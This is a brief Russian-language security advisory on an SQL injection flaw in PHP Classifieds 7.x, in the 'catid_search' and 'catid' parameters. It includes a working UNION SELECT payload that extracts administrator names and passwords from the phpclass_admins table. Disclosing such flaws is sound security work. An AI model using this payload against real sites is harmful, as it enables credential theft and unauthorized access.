Программа: PHP Classifieds 7.x
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Из-за ошибки проверки вводимых пользовательских данных в параметре «catid_search» различными сценариями злоумышленник может произвести SQL-инъекцию.
Примеры:
search.php?catid_search=[sql]
index.php?catid=[sql]
Например, вывести имя пользователя и пароль в заголовок страницы:
index.php?catid=0 UNION SELECT concat(adm_name, space(1), adm_pass) AS adm_name, NULL FROM phpclass_admins
